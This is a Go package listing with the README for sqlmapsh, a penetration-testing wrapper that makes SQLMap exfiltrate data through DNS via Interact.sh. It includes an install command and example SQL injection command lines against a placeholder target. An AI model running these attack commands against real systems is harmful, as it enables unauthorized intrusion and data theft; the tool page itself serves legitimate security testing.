sqlmapsh

command module
v1.1.2 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Jan 15, 2026 License: GPL-3.0 Imports: 7 Imported by: 0

README

SQLMap.sh

Go Report Card License GitHub release (latest by date)

SQLMap.sh is a SQLMap wrapper that lets you use Interact.sh as a DNS server for exfiltrating data with zero configuration.

To use the SQLMap --dns-domain flag you need to open your port 53 to the internet to let it run its own DNS server and you need a properly configured domain. This is not always possible during a penetration test engagement or maybe you just don't want to buy a domain for this.

SQLMap.sh solves this problem transparently. Just use it as if it is SQLMap and your are done to exfiltrate data via DNS.

Installation

Run the following command to install the latest version.

go install github.com/unlock-security/sqlmapsh@latest

Usage

Just replace sqlmap with sudo sqlmapsh when you want to use SQLMap with data exfiltration via DNS.

[!IMPORTANT] SQLMap requires root privileges to perform data exfiltration via DNS because it needs to bind it's own DNS server locally on port 53

For example:

$ sqlmap -u 'https://www.target.com/page=1' -p page --level=5 --risk=3 --technique=E --banner

Become:

$ sudo sqlmapsh -u 'https://www.target.com/page=1' -p page --level=5 --risk=3 --technique=E --banner

Made with 💙 by Unlock Security

Documentation

The Go Gopher

There is no documentation for this package.

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.